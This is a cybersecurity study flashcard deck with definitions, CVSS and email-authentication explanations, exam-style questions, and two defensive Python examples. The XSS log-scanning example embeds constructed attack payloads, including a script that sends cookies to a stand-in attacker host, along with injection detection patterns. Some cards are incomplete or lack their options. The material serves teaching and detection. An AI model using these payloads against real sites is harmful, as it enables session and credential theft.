Here’s a breakdown of what threat hunting involves:

Proactive Searching: Threat hunters don’t wait for alerts from security systems. Instead, they actively search for anomalies and indicators of compromise (IOCs) that might suggest an attacker is present in the network.

Hypothesis-Driven: Hunters often start with a hypothesis about how an attack might occur or how a threat actor might behave. They use this hypothesis to guide their search for evidence.

Analysis of Data: They analyze data from various sources, such as network traffic, system logs, and endpoint activity, to identify patterns or behaviors indicative of a threat.

Use of Tools and Techniques: Threat hunters employ various tools, including advanced analytics, machine learning, and custom scripts, to detect hidden threats. They might also use threat intelligence feeds to stay updated on the latest attack techniques.

Collaboration: Threat hunting often involves collaboration with other teams, such as incident response and forensic teams, to validate findings and develop mitigation strategies.

Continuous Improvement: Findings from threat hunting activities are used to refine and improve the organization’s security posture, such as updating detection rules, improving response protocols, and enhancing overall defenses.

In essence, threat hunting aims to find and neutralize threats before they can cause significant damage, improving the organization’s overall security resilience.

96
Q

What is a Cloud Access Security Broker (CASB)?

A

A Cloud Access Security Broker (CASB) is a security solution designed to manage and secure access to cloud-based services and applications. CASBs act as an intermediary between users and cloud service providers, providing visibility, control, and protection for data and applications in the cloud. They help organizations enforce security policies and ensure compliance with regulations, addressing various concerns related to cloud usage.

97
Q

What is data loss prevention (DLP) used for?

A

Data Loss Prevention (DLP) is a cybersecurity technology used to prevent sensitive data from being accidentally or intentionally copied, transferred, or shared outside of an organization’s authorized boundaries. It helps protect against data breaches, regulatory violations, and financial losses.

Here are some common use cases for DLP:

Preventing data exfiltration: DLP can detect and block attempts to copy or transfer sensitive data to unauthorized locations, such as personal email accounts or external devices.
Enforcing compliance: DLP can help organizations comply with industry regulations like GDPR, HIPAA, and PCI DSS, which require strict data protection measures.
Protecting intellectual property: DLP can safeguard valuable intellectual property, such as trade secrets, research data, and customer information.
Preventing insider threats: DLP can detect and prevent malicious insiders from stealing or sharing sensitive data.
DLP solutions typically use a combination of techniques, including:

Content analysis: Examining the content of files and messages to identify sensitive data.
Context analysis: Analyzing the context in which data is accessed or transferred to determine if it is authorized.
User behavior analysis: Monitoring user behavior to detect suspicious activity.
Encryption: Encrypting sensitive data to make it unreadable if it is intercepted.
Access controls: Restricting access to sensitive data based on user roles and permissions.
By implementing effective DLP measures, organizations can significantly reduce the risk of data breaches and protect their valuable assets.

98
Q

Multi Cloud Security

A

Multi-cloud security refers to the practice of protecting data and applications deployed across multiple cloud platforms (e.g., AWS, Azure, Google Cloud). As organizations increasingly adopt hybrid and multi-cloud strategies, ensuring security across these environments becomes paramount.

99
Q

What is Security Architecture?

A

Security architecture is the design and implementation of a comprehensive security strategy for an organization’s IT infrastructure. It provides a blueprint for protecting information assets and ensuring compliance with security regulations.

100
Q

Security architecture: key components, goals and common patterns

A

Key components of security architecture include:

Security policies and standards: A set of guidelines and rules that define the organization’s security practices.
Security controls: Mechanisms used to protect information assets, such as firewalls, intrusion detection systems, encryption, and access controls.
Security frameworks: Standardized approaches to security management, such as NIST Cybersecurity Framework or ISO 27001.
Security risk management: The process of identifying, assessing, and mitigating security risks.
A well-designed security architecture should address the following goals:

Confidentiality: Ensuring that information remains private and accessible only to authorized individuals.
Integrity: Protecting information from unauthorized modification or deletion.
Availability: Ensuring that information is accessible when needed.
Non-repudiation: Preventing users from denying their actions or involvement in a transaction.
Common security architectures include:

Defense in depth: A layered approach to security that uses multiple controls to protect information assets.
Zero trust: A security model that assumes that all network traffic is untrusted and requires strong authentication and authorization before granting access.
Cloud security architecture: A specific type of architecture designed to protect cloud-based applications and data.
By developing a robust security architecture, organizations can improve their resilience to cyber threats and protect their valuable information assets.

101
Q

What is security orchestration, automation and response (SOAR)?

A

Security Orchestration, Automation, and Response (SOAR) is a technology platform designed to streamline and improve security operations by automating repetitive tasks, integrating disparate security tools, and providing a centralized view of security events.
Key components of SOAR include:

Automation: Automating routine security tasks, such as threat intelligence gathering, vulnerability scanning, and incident response procedures.
Orchestration: Coordinating and integrating multiple security tools and processes to create a cohesive security response.
Response: Providing a platform for security analysts to investigate and respond to security incidents efficiently.

102
Q

What is an XSS attempt?

A

XSS (Cross-Site Scripting) is a type of web application vulnerability that allows an attacker to inject malicious scripts into a webpage that is viewed by other users. These scripts can be used to steal sensitive information, redirect users to malicious websites, or perform other malicious actions.

103
Q

XSS types:

A

Reflected XSS: The payload travels in the request (a URL parameter, form field or header) and is echoed straight back in the server's response; the victim has to be lured into sending that request, typically through a crafted link.
Stored XSS: The payload is persisted server-side (a comment, profile field or message) and served to every user who later views the affected page, so no per-victim lure is needed.
DOM-based XSS: The payload is written into the page by client-side JavaScript (for example a script that copies location.hash or document.URL into innerHTML). The vulnerable code runs in the browser and the payload may never reach the server, so server-side filtering and server logs do not see it.
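The two cards above describe what an XSS attempt looks like and how the three types differ. The following added example (written for this deck; not code from any product or from the deck's source) runs detection logic over constructed web server access-log lines to flag reflected XSS attempts in URL parameters, and shows the output-encoding fix on the server side. It only sees what reaches the server in the query string: stored-XSS payloads arrive in POST bodies that an access log does not record, and DOM-based payloads carried in the URL fragment (#...) are never sent to the server at all.

```python
"""Flag cross-site scripting attempts in web server access logs and show the
output-encoding fix. Added example for this deck, not code from any project;
the log lines below are constructed."""
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines in Common Log Format.
LOG_LINES = [
    '203.0.113.9 - - [10/Oct/2024:13:55:36 +0000] "GET /search?q=laptops HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2024:13:55:41 +0000] "GET /search?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 5211',
    '198.51.100.7 - - [10/Oct/2024:13:56:02 +0000] "GET /profile?name=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 200 3301',
    '198.51.100.7 - - [10/Oct/2024:13:56:10 +0000] "GET /redirect?url=javascript:alert(document.domain) HTTP/1.1" 302 0',
    '192.0.2.33 - - [10/Oct/2024:13:57:00 +0000] "POST /comment HTTP/1.1" 200 88',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators of script injection, checked against the URL-decoded parameter value.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),                 # inline event handler, e.g. onerror=
    re.compile(r"javascript\s*:", re.I),                 # javascript: URI in a link or redirect
    re.compile(r"<\s*(iframe|svg|img|object|embed)\b", re.I),
]


def xss_findings(log_lines):
    """Return (client_ip, parameter, decoded_value, pattern) for each suspicious parameter."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes once and turns '+' into spaces, which is what the
        # application sees; a second decode pass would be needed to catch double encoding.
        for name, value in parse_qsl(query, keep_blank_values=True):
            for pattern in XSS_PATTERNS:
                if pattern.search(value):
                    findings.append((client_ip, name, value, pattern.pattern))
                    break
    return findings


def render_vulnerable(term):
    """Reflects the search term into the HTML response verbatim: reflected XSS."""
    return f"<p>Results for {term}</p>"


def render_safe(term):
    """Same page with HTML entity encoding applied to the untrusted value."""
    return f"<p>Results for {html.escape(term, quote=True)}</p>"


if __name__ == "__main__":
    for client_ip, name, value, pattern in xss_findings(LOG_LINES):
        print(f"{client_ip} parameter={name!r} matched {pattern!r}: {value}")
    payload = "<script>alert(1)</script>"
    print(render_vulnerable(payload))
    print(render_safe(payload))
```

Signature matching like this is useful for triage but easy to evade (case tricks are handled by re.I, but double encoding, unusual tags and attribute-context payloads are not), so it complements rather than replaces a web application firewall and, above all, the context-aware output encoding shown in render_safe.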

104
Q

What is Cyber Kill Chain?

A

The Cyber Kill Chain is a conceptual framework, developed by Lockheed Martin, that outlines the stages a cyberattack typically follows. It is a helpful tool for understanding and defending against cyber threats: by mapping defenses to each stage, organizations can prevent or mitigate an attack before it reaches its objective. For example, they can strengthen network security, educate employees about phishing threats, and deploy intrusion detection systems.

105
Q

The stages of the Cyber Kill Chain are:

A

1-Reconnaissance: The attacker gathers information about the target, such as its networks, systems, and vulnerabilities.
2-Weaponization: The attacker develops malicious payloads, such as malware or exploit code.
3-Delivery: The attacker delivers the malicious payload to the target, often through email, phishing, or social engineering.
4-Exploitation: The attacker exploits vulnerabilities in the target’s systems to gain unauthorized access.
5-Installation: The attacker installs malicious software on the target’s systems.
6-Command and Control: The attacker establishes a communication channel with the compromised systems to maintain control.
7-Actions on Objectives: The attacker carries out their intended actions, such as stealing data, disrupting operations, or causing damage.

106
Q

What is Single Pane of Glass?

A

Single Pane of Glass (SPOG) is a concept in IT management that refers to a centralized platform or dashboard that provides a unified view of an organization’s entire IT infrastructure. It allows administrators to monitor and manage various IT components, such as servers, networks, applications, and security systems, from a single interface.

107
Q

Key benefits of SPOG
(Single Pane Of Glass)

A

Key benefits of SPOG:

Improved visibility: Provides a comprehensive overview of an organization’s IT environment, making it easier to identify potential issues and bottlenecks.
Enhanced efficiency: Streamlines IT operations by automating routine tasks and reducing manual effort.
Centralized management: Offers a centralized platform for managing and controlling IT resources.
Simplified troubleshooting: Facilitates troubleshooting by providing a single point of access to relevant information and tools.
Enhanced security: Improves security by providing a centralized view of potential threats and vulnerabilities.

108
Q

What is CVSS

A

CVSS (Common Vulnerability Scoring System) is a standardized framework used to measure the severity of software vulnerabilities. It assigns a numerical score to each vulnerability based on various factors, such as exploitability, impact, and the availability of a patch.

109
Q

Key Components of CVSS:

A

Key components of CVSS:

Base Score: The fundamental score that reflects the intrinsic characteristics of the vulnerability.
Temporal Score: Adjusts the base score based on factors like the availability of a patch or exploit.
Environmental Score: Adjusts the temporal score based on the specific environment in which the vulnerability exists.

110
Q

Factors considered in CVSS:

A

Attack Vector (AV): How the vulnerable component is reached: Network, Adjacent, Local or Physical.
Attack Complexity (AC): Whether conditions outside the attacker's control (such as winning a race condition or a specific configuration) must be met for exploitation: Low or High.
Privileges Required (PR): The level of privileges the attacker must already hold to exploit the vulnerability: None, Low or High. (CVSS v2 had an Authentication metric instead; v3 replaced it with PR.)
User Interaction (UI): Whether a user other than the attacker must participate, for example by opening a file or clicking a link: None or Required.
Scope (S): Whether a successful exploit affects resources beyond the security authority of the vulnerable component, for example a guest-to-hypervisor escape or a browser sandbox escape: Unchanged or Changed.
Confidentiality Impact (C): The loss of confidentiality in the impacted component (e.g., data disclosure): None, Low or High.
Integrity Impact (I): The loss of integrity (e.g., data modification): None, Low or High.
Availability Impact (A): The loss of availability (e.g., system downtime): None, Low or High.

111
Q

CVSS breakdown

A

Example vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:X/RC:X

CVSS:3.1: The version of CVSS used.
AV:N: Attack Vector: Network
AC:L: Attack Complexity: Low
PR:N: Privileges Required: None
UI:R: User Interaction: Required
S:U: Scope: Unchanged
C:H: Confidentiality Impact: High
I:H: Integrity Impact: High
A:H: Availability Impact: High
E:P: Exploit Code Maturity: Proof-of-Concept
RL:X: Remediation Level: Not Defined
RC:X: Report Confidence: Not Defined

The eight base metrics give a base score of 8.8 (High); applying the temporal metrics (E:P = 0.94, RL:X and RC:X = 1.0) gives a temporal score of 8.3. In the temporal group "X" means Not Defined (the metric is skipped), not "unknown". Remediation Level takes the values X, O (Official Fix), T (Temporary Fix), W (Workaround) or U (Unavailable); there is no "RL:D" value and no "Report Update" (RU) metric in CVSS v3.1.

112
Q

What is an IPS event?

A

IPS Event refers to an incident or occurrence detected by an Intrusion Prevention System (IPS). An IPS is a security device or software that monitors network traffic for malicious activity and takes action to prevent attacks from succeeding.

113
Q

What is SDLC phase

A

SDLC phase refers to one stage of the Software Development Life Cycle, the process used to plan, build and maintain software. The phases are usually given as requirements gathering, design, implementation (coding), testing, deployment and maintenance, each with its own goals and activities. In a secure SDLC, security work is attached to each phase, such as threat modeling during design, code review and static analysis during implementation, and penetration testing before release.

114
Q

what is a tabletop exercise?

A

A tabletop exercise is a simulated scenario that helps organizations test their emergency response plans and procedures. It’s a controlled environment where participants can practice responding to a hypothetical crisis or incident without the risks and consequences of a real-world event.

115
Q

what is TTP?

A

TTP in cybersecurity typically refers to Tactics, Techniques, and Procedures. It’s a framework used to categorize and analyze the methods employed by threat actors to compromise systems and networks

116
Q

Obfuscated Link…??

A

Obfuscated links are links that have been disguised or altered to make it difficult to determine their true destination. This can be done for various reasons, including:

To hide malicious intent: Attackers may obfuscate links to phishing websites or malware downloads to make them appear legitimate.
To track clicks: Marketers may obfuscate links to track click-through rates and analyze user behavior.
To protect sensitive information: Organizations may obfuscate links to sensitive data to prevent unauthorized access.

117
Q

CMMI Model

A

The Capability Maturity Model Integration (CMMI) is a process improvement framework that helps organizations improve their ability to deliver products and services. It provides a structured approach to process improvement built around five maturity levels (the names below are those of the original CMM, which this deck uses; CMMI itself calls level 2 "Managed", level 4 "Quantitatively Managed" and level 5 "Optimizing"):
Level 1, Initial: Processes are ad hoc and poorly defined; success depends on individual effort.
Level 2, Repeatable (CMMI: Managed): Basic project management processes are established so that earlier successes can be repeated, but they may be inconsistent across the organization.
Level 3, Defined: Processes are standardized and documented organization-wide, but not yet quantitatively controlled.
Level 4, Managed (CMMI: Quantitatively Managed): Processes are quantitatively measured and controlled.
Level 5, Optimized (CMMI: Optimizing): Processes are continuously improved using quantitative feedback.

118
Q

OWASP

A

OWASP (the Open Web Application Security Project, renamed the Open Worldwide Application Security Project in 2023) is a global nonprofit organization focused on improving the security of software applications. It provides frameworks, tools, and resources to help developers and security professionals build more secure web applications.

Some of OWASP’s key initiatives include:

OWASP Top 10: A list of the most critical web application security risks.
OWASP ZAP: A free and open-source web application security scanner.
OWASP Security Knowledge Base: A collection of articles, tutorials, and resources on web application security.
OWASP Testing Guide: A comprehensive guide to web application security testing.

119
Q

SLA

A

SLA stands for Service Level Agreement. In the context of cybersecurity, an SLA is a contract between a service provider (such as a Managed Security Service Provider, MSSP) and a client that outlines the specific security services to be provided and the expected level of performance, for example the maximum time to acknowledge and contain an incident.

120
Q

Key components of a cybersecurity SLA typically include:

A

Scope of Services: Clearly defined services, such as vulnerability assessments, penetration testing, incident response, or threat monitoring.

Performance Metrics: Specific measurements used to evaluate the service provider’s performance, such as response times to incidents, uptime guarantees, or compliance with industry standards.
Responsibilities: Clearly defined roles and responsibilities of both the service provider and the client.
Incident Response Plan: Procedures for handling security incidents, including notification processes, investigation steps, and remediation actions.
Termination Clauses: Conditions under which the agreement can be terminated.
Confidentiality and Data Privacy: Provisions to protect sensitive information.

121
Q

Key Components of a CASB Policy

A

Data Classification
Access Controls
Data Loss Prevention (DLP)
Threat Detection and Response
Compliance Requirements
Incident Response Plan
User Education and Awareness

122
Q

MITRE ATT&CK

A

MITRE ATT&CK is a comprehensive framework for analyzing and understanding the tactics, techniques, and procedures (TTPs) used by attackers in cyber attacks.

While the cyber kill chain provides a detailed view of the different stages of an attack, it does not provide as much detail about the tactics, techniques, and procedures used by the attacker as MITRE ATT&CK.

The SANS Institute Top 20 Critical Security Controls (now maintained by the Center for Internet Security as the CIS Critical Security Controls, reduced to 18 controls in version 8) list the most important security controls organizations should implement to protect against cyber attacks. They prescribe defensive measures and do not catalogue attacker tactics, techniques, and procedures (TTPs).

While the National Institute of Standards and Technology (NIST) provides a comprehensive view of information security, it does not provide a framework for analyzing tactics, techniques, and procedures (TTPs).

123
Q

Cuckoo Sandbox

A

is a versatile open-source platform designed for the analysis of malware behavior. It provides a controlled environment where suspicious files can be executed safely, allowing security analysts to observe and understand their actions.

124
Q

A security analyst has received a suspicious email that appears to be from a recognized address. The analyst needs to determine if the email is legitimate or not. Which of the following email analysis methods would be the most appropriate for the security analyst to use in this scenario?

A.Email Header Analysis
B.Link and Attachment Analysis
C.Sender Reputation Verification
D.Analysis of Domain-based Message Authentication, Reporting and Conformance (DMARC) results

A

D.DMARC combines two other email authentication protocols, SPF and DKIM. It allows the receiver to check that an email claimed to have come from a specific domain was indeed authorized by the owner of that domain. This can help verify the authenticity of the email.

While email header analysis can provide valuable information about the origin and path of an email, it may not definitively prove the legitimacy of the email.

While this technique can help identify malicious links or attachments in an email, it doesn’t confirm the legitimacy of the sender.

Verifying the reputation of the sender can be helpful but does not provide a foolproof method of determining the legitimacy of the email.

125
Q

A network administrator at a large business is performing a security assessment of the company’s network infrastructure. The administrator must determine the most appropriate framework for conducting a comprehensive security assessment. Which of the following frameworks would be the most appropriate for the network administrator?

A.National Institute of Standards and Technology (NIST) Cybersecurity Framework
B.Federal Information Security Management Act (FISMA)
C.Open Source Security Testing Methodology Manual (OSSTMM)
D.International Organization for Standardization (ISO) 27001/27002

A

C.-Open Source Security Testing Methodology Manual (OSSTMM) is a comprehensive methodology for conducting a security assessment of a network infrastructure.

126
Q

A network administrator has received reports of intermittent connectivity issues. To diagnose the problem, the network administrator has decided to use tcpdump. Which of the following are the primary functionalities of using tcpdump in this scenario? (Select the two best options.)

A.To monitor network performance
B.To capture and analyze network packets for troubleshooting purposes
C.To detect and prevent malicious activity on the network
D.To implement network-based firewall rules

A

A and B.-tcpdump is a packet capture tool: it records the traffic seen on an interface (optionally narrowed with a BPF filter expression) for analysis. In this scenario the captured packets reveal the retransmissions, resets or delays behind the intermittent connectivity reports (A, monitoring network performance) and let the administrator diagnose the fault itself (B, capturing and analyzing packets for troubleshooting).

tcpdump is passive: it neither blocks malicious traffic nor implements firewall rules, so C and D are not functions of the tool.

127
Q

An e-commerce company has recently experienced a series of phishing attacks targeting its employees. The company tasks the security team with implementing a solution to prevent email spoofing and protect against future phishing attempts. Which of the following technologies would be the most effective at achieving this goal?

A.Two-factor authentication
B.DNS-based Authentication of Named Entities (DANE)
C.Sender Policy Framework (SPF)
D.Public key infrastructure (PKI)

A

C.-Sender Policy Framework (SPF) lets a domain owner publish in DNS which mail servers are authorized to send mail for the domain, so a receiving server can reject messages whose envelope sender (MAIL FROM) is spoofed. Because SPF checks only the envelope sender, it is normally deployed together with DKIM and DMARC, which add alignment with the From header the user actually sees. DNS-based Authentication of Named Entities (DANE) verifies a server's TLS certificate through DNSSEC-signed records; it protects the transport, not the sender's identity, so it does not address spoofing or phishing. Two-factor authentication and PKI protect accounts and certificates but do not stop a spoofed message from being delivered.

128
Q

A network administrator at a small business is concerned about the increasing number of phishing attacks that are targeting the organization’s employees. The administrator wants to implement a comprehensive solution to help protect the organization from these types of attacks. Which of the following solutions would be the most appropriate for the network administrator to use in this scenario?

A

B.Domain-based Message Authentication, Reporting, and Conformance (DMARC)
Domain-based Message Authentication, Reporting & Conformance (DMARC) is a comprehensive solution for protecting against phishing attacks. It builds on Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) to provide a complete solution for preventing email spoofing.
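Cards 124, 127 and 128 describe how DMARC builds on SPF and DKIM to decide whether a message claiming a domain was authorized by it. The following added example (written for this deck; not code from any mail product or from the deck's source) performs the DMARC check a receiving mail server makes: it reads the SPF and DKIM results recorded in the Authentication-Results header, tests identifier alignment against the From header domain, and applies the published policy. The two messages and the DMARC record are constructed, and the organizational-domain logic is a simplification (real receivers use the Public Suffix List).

```python
"""Evaluate DMARC for a received message from its Authentication-Results header.
Added example for this deck, not code from any mail product. The messages and
the DMARC record are constructed; org_domain() is a simplification of the
organizational-domain rule (real implementations consult the Public Suffix List)."""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed DMARC TXT record as it would be published at _dmarc.example.com
DMARC_RECORD = "v=DMARC1; p=reject; adkim=r; aspf=r; rua=mailto:dmarc@example.com"

# Constructed message 1: legitimate. DKIM-signed by example.com; SPF passes for a bounce subdomain.
LEGIT = """\
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=bounce.example.com; dkim=pass header.d=example.com
From: Accounts Payable <ap@example.com>
To: staff@corp.example
Subject: Invoice 4471

Please find the invoice attached.
"""

# Constructed message 2: spoofed From header, sent from an attacker-controlled domain, no DKIM.
SPOOF = """\
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=mailer.evil.example; dkim=none
From: CEO <ceo@example.com>
To: finance@corp.example
Subject: Urgent wire transfer

Wire the funds today and confirm.
"""


def parse_tag_value(record):
    """Parse a 'k=v; k=v' record such as a DMARC TXT record into a dict."""
    return dict(kv.strip().split("=", 1) for kv in record.split(";") if "=" in kv)


def org_domain(domain):
    """Simplified organizational domain: the last two labels."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(identifier_domain, from_domain, mode):
    """Strict (s) alignment needs an exact match; relaxed (r) needs the same organizational domain."""
    if mode == "s":
        return identifier_domain.lower() == from_domain.lower()
    return org_domain(identifier_domain) == org_domain(from_domain)


def dmarc_evaluate(raw_message, dmarc_record):
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg["From"])[1].split("@")[-1]
    results = msg["Authentication-Results"] or ""
    spf = re.search(r"spf=(\w+)\s+smtp\.mailfrom=([\w.-]+)", results)
    dkim = re.search(r"dkim=(\w+)(?:\s+header\.d=([\w.-]+))?", results)
    policy = parse_tag_value(dmarc_record)
    # SPF authenticates the envelope sender (MAIL FROM); DKIM authenticates the signing domain (d=).
    # DMARC passes if either result passes AND its domain aligns with the visible From domain.
    spf_ok = bool(spf) and spf.group(1) == "pass" and aligned(spf.group(2), from_domain, policy.get("aspf", "r"))
    dkim_ok = (bool(dkim) and dkim.group(1) == "pass" and dkim.group(2) is not None
               and aligned(dkim.group(2), from_domain, policy.get("adkim", "r")))
    passed = spf_ok or dkim_ok
    return {
        "from_domain": from_domain,
        "spf_aligned": spf_ok,
        "dkim_aligned": dkim_ok,
        "dmarc": "pass" if passed else "fail",
        # p= is the domain owner's requested handling for failures: none, quarantine or reject.
        "disposition": "none" if passed else policy.get("p", "none"),
    }


if __name__ == "__main__":
    for label, raw in (("legit", LEGIT), ("spoof", SPOOF)):
        print(label, dmarc_evaluate(raw, DMARC_RECORD))
```

Two operational points follow from the code. The SPOOF message passes SPF for the attacker's own domain, which is why SPF alone (card 127) does not stop this phishing: only the alignment check against the From header catches it. And an Authentication-Results header is trustworthy only when your own border MTA added it, so inbound messages that already carry one claiming your authserv-id must have it stripped, or an attacker can simply write "dkim=pass" into the message.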

129
Q

An organization plans to conduct a security assessment and wants to utilize a comprehensive and open approach to guide the assessment process. Which of the following covers various security aspects, such as physical, information, and wireless security, making it the most appropriate choice for the organization’s security assessment?

A.Open Worldwide Application Security Project (OWASP) Top Ten
B.MITRE ATT&CK
C.National Institute of Standards and Technology (NIST) Cybersecurity Framework
D.Open Source Security Testing Methodology Manual (OSSTMM)

A

D.-The Open Source Security Testing Methodology Manual (OSSTMM) covers various security aspects, such as physical, information, and wireless security, making it the most appropriate choice for the organization’s security assessment.

130
Q

A security analyst is responsible for detecting and responding to security incidents in the organization. The security analyst has decided to implement a security orchestration, automation, and response (SOAR) platform. What is the primary purpose of using a SOAR platform in this scenario?

A.To automate incident responses
B.To provide real-time threat intelligence to security teams
C.To store and manage security-related data
D.To monitor and control access to sensitive information

A

A.-Automating incident responses is one of the key benefits of using a security orchestration, automation, and response (SOAR) platform. The security analyst can respond to incidents more quickly and effectively by automating routine and repetitive tasks.

131
Q

A security analyst monitors the network traffic of an enterprise environment. The analyst has noticed activity on an unexpected port and needs to determine the cause. What is the most likely explanation for the activity on the unexpected port?

A.Distributed denial-of-service (DDoS) attack
B.Phishing campaign
C.Malware infection
D.Unpatched software

A

C.-A malware infection can cause activity on unexpected ports as the malware communicates with its command-and-control server, exfiltrates data, or carries out other malicious activities.

132
Q

A security analyst is conducting a review of a server in a large organization. The analyst has noticed that the server’s disk capacity is almost full. What is the most likely cause of high disk capacity consumption in this scenario?

A.Insufficient cache
B.Large data sets
C.Disk fragmentation
D.Disk corruption

A

B.- Storing large data sets can consume a significant amount of disk capacity, particularly if the data is in multiple locations or if a user improperly manages and archives the data.

133
Q

A threat intelligence analyst is conducting a network reconnaissance and needs to gather information about the relationships between various entities on the target network. Which tool could the analyst use to accomplish this task?

A.Wireshark
B.Maltego
C.OpenVAS
D.Tcpdump

A

B.- Maltego is a tool specifically designed for information gathering and visualizing the relationships between various entities. It can gather information about domains, IP addresses, and other network entities to help identify potential targets for a cyber attack.

134
Q

A company’s IT security team must perform a comprehensive vulnerability assessment on its network infrastructure to identify potential security weaknesses and misconfigurations. The team requires a tool to scan various systems, devices, and applications and provide detailed reports with actionable recommendations. What tool can accomplish this task?

A.Burp Suite
B.Splunk
C.Nessus
D.Snort

A

C.- Nessus is a vulnerability scanning tool that supports scanning various types of systems, devices, and applications. The team can use Nessus to provide detailed reports with actionable recommendations.

Burp Suite is a web application security testing tool that focuses on identifying vulnerabilities and security issues in web applications. It is not specifically used for comprehensive vulnerability assessments across the network infrastructure.

Splunk is a powerful data analytics and log management platform that helps organizations gain insights from their data and monitor their infrastructure. It is not specifically used for comprehensive vulnerability assessments.

Snort is an open-source intrusion detection and prevention system (IDPS) that monitors network traffic for malicious activities and potential security threats. It is not for comprehensive vulnerability assessments.

135
Q

A security analyst is investigating a server issue where the memory utilization is consistently high. What is most likely the cause of the high memory consumption?

A.Memory leaks
B.Insufficient hard disk space
C.Disk defragmentation
D.Insufficient cache

A

A.- Memory leaks occur when an application allocates memory but does not release it when it is no longer needed, causing high memory consumption over time. It is the most likely cause of high memory consumption.

136
Q

B.Angry IP scanner

A

Angry IP Scanner provides basic information about open ports and services but may not provide the same level of detail or accuracy as Nmap.

137
Q

Nmap

A

Nmap is a popular open-source tool for network discovery, mapping, and security auditing. Its features include the ability to scan a large number of hosts, detect operating systems and applications, and perform vulnerability assessments.

138
Q

OpenVAS

A

The OpenVAS tool is an open-source vulnerability scanner that can identify vulnerabilities in multiple operating systems and devices, making it a suitable option for the security analyst.

139
Q

A security analyst is monitoring the network traffic of a large organization. The analyst has noticed an unusual spike in network traffic and needs to determine the cause. What is the most likely explanation for the unusual spike in network traffic?

A.Background traffic
B.Distributed denial-of-service (DDoS) attack
C.Network configuration issue
D.Heightened user activity

A

B.- A distributed denial-of-service (DDoS) attack is a type of cyber attack that uses multiple compromised devices to flood a target network with traffic, causing a denial of service. An unusual spike in network traffic could indicate a DDoS attack.

140
Q

A network administrator is performing a quick network scan to identify all devices and services on the organization’s network. The administrator does not require extra features but is required to use an open-source solution. Which of the following tools would be the most appropriate for the network administrator to use in this scenario?

A.Angry IP
B.Wireshark
C.Nessus
D.Traceroute

A

A.- Angry IP Scanner is a popular open-source network scanning and mapping tool. It can scan an entire network or a range of IP addresses to identify all connected devices and services.

141
Q

A network security analyst is performing a penetration testing engagement for a client. The analyst needs to exploit vulnerabilities in the client’s network. Which of the following tools is most commonly used by security professionals for this purpose?

A.Metasploit
B.Nessus
C.OpenVAS
D.Angry IP scanner

A

A.- Metasploit is a widely used framework for penetration testing and exploiting vulnerabilities. It allows security professionals to test the security of a network by finding and exploiting vulnerabilities.

142
Q

A security analyst is conducting an assessment of the network security of a small office. The analyst must determine if any unauthorized devices and services are on the network. What type of scan/sweep would indicate to the security analyst that unauthorized devices and services are running on the network?

A.Port scan
B.Ping sweep
C.TCP sweep
D.UDP sweep

A

A.- By determining which ports are open using a port scan, the security analyst can determine what services or applications are running on the target device, and identify any unauthorized devices or services that may be present on the network.

143
Q

Nikto

A

is another popular web application scanner designed to use the command line, and the project website is https://www.cirt.net/nikto2. Nikto can discover the type of HTTP server and web applications running on a host and expose vulnerabilities contained within them. Nikto scans using default settings can be easily performed using the command nikto -h.

144
Q

Arachni

A

is another open-source web scanner application (arachni-scanner.com) available with both command line and web-based graphical interfaces. By default, the scanner audits HTML forms, JavaScript forms, JSON input, XML input, links, and any orphan input elements. The scanner actively tests many different vulnerabilities, including code injection, SQL injection, XSS, CSRF, local and remote file inclusion, session fixation, directory traversal, backdoors, insecure policies, server information leakage, personal data exposure, and others.

145
Q

Prowler

A

is an audit tool for use with AWS only. It can detect misconfigurations and security issues, such as weak passwords, unpatched systems, and insecure protocol use. It can also be used to evaluate cloud infrastructure against the CIS Benchmarks™ for AWS (cisecurity.org/benchmark/amazon_web_services) and perform regulatory compliance checks.

146
Q

ScoutSuite

A

is a powerful open-source security auditing tool used to assess cloud infrastructure security. It allows organizations to evaluate the security of their cloud environments across multiple providers and services, such as Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP). The tool collects data from a cloud platform using API calls. Then it compiles a report of all the discovered objects, including VM instances, storage containers, IAM accounts, data, firewall ACLs, and many others. The scanner ruleset can categorize discovered items with severity levels based on predetermined policies.

147
Q

Pacu

A

is designed as an exploitation framework for evaluating the security of an AWS environment. It includes modules for exploiting APIs and VM instances. An attacker or pen tester can use cloud-access credentials to determine how they may be abused to gather information about other accounts and configured services, or gain unauthorized access to cloud services.

148
Q

A security analyst is performing a web application security assessment for a client to determine if any vulnerabilities exist in the web application and provide recommendations for remediation. Which tool is best suited for this task, considering its ability to identify security vulnerabilities and create and share custom scripts and plugins?

A.Burp Suite Community Edition
B.Aircrack-ng
C.Zed Attack Proxy (ZAP)
D.Metasploit

A

C. Zed Attack Proxy (ZAP) is a free, open-source web application security testing tool. It identifies security vulnerabilities in web applications and supports creating and sharing custom scripts and plugins. ZAP is a popular choice for web application security assessments.

149
Q

A software development company is building a custom web application for a client that will process sensitive financial information. The client has specified that a software developer must thoroughly test the application for security vulnerabilities before it goes into production. The company has several security testing options but wants to use the tool that will provide the most comprehensive results. What tool should the company use in this instance?

A.Nessus
B.Burp Suite
C.Metasploit
D.Nmap

A

B.- Burp Suite is a web application security testing tool that provides comprehensive features for identifying and mitigating security vulnerabilities. It would be the most appropriate tool for the software development company to use in this scenario.

150
Q

